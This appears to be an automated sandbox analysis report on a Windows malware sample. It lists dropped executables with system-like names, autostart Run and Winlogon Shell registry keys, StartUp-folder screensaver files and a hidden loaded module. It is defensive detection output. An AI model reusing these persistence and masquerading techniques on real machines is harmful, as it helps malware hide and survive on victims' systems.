Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe

File created: C:\ProgramData\svchost.exe

Jump to dropped file

Found pyInstaller with non standard icon

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe

Process created: "C:\Users\user\AppData\Roaming\RuntimeBroker.exe"

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI76842\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\ZlZjQqUm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\KBGuTvrT.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI76842\unicodedata.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\moRxsLqL.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Program Files\Uninstall Information\cmd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\IIrMizFV.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68642\libcrypto-1_1.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI76842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI76842\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI76842\select.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI76842\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\libffi-7.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68642\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\RhnciprG.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68642\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\nCAYcgzI.log	Jump to dropped file
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	File created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68642\select.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68642\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\BhVFUouj.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI76842\VCRUNTIME140.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\kuPhBLMV.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	File created: C:\ProgramData\svchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68642\VCRUNTIME140.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\python310.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\rar.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\PyvtgeZE.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\rtqOkdzB.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68642\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NuVdFscS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	File created: C:\ProgramData\Microsoft\based.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\iGLZQxQX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\pYJguVIM.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	File created: C:\ProgramData\setup.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68642\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\XSgjglWp.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI76842\libcrypto-1_1.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\vosgrJpv.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\dTtanABj.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\shuXVqvz.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\FOowrzbf.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	File created: C:\ProgramData\Microsoft\hacn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\DLBNVQXk.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\cscript.exe	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	File created: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI76842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\FGEdMQBa.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\gEYquOMc.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI76842\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\_queue.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68642\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI68642\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\PGfLLOAK.log	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\libssl-1_1.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI77042\_hashlib.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	File created: C:\ProgramData\Microsoft\based.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	File created: C:\ProgramData\Microsoft\hacn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	File created: C:\ProgramData\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	File created: C:\ProgramData\svchost.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

File created: C:\Users\user\cscript.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\iGLZQxQX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\XSgjglWp.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\FGEdMQBa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\moRxsLqL.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\shuXVqvz.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\IIrMizFV.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\PGfLLOAK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\vosgrJpv.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\pYJguVIM.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\BhVFUouj.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\rtqOkdzB.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\ZlZjQqUm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\PyvtgeZE.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\nCAYcgzI.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NuVdFscS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\DLBNVQXk.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\kuPhBLMV.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\RhnciprG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\gEYquOMc.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\FOowrzbf.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\dTtanABj.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\KBGuTvrT.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Users\user\NetHood\powershell.exe"

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cscript
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd

Drops PE files to the user root directory

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

File created: C:\Users\user\cscript.exe

Jump to dropped file

Source: C:\ProgramData\Microsoft\based.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Source: C:\ProgramData\Microsoft\based.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cscript
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cscript
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cscript
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cscript
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\ProgramData\setup.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe

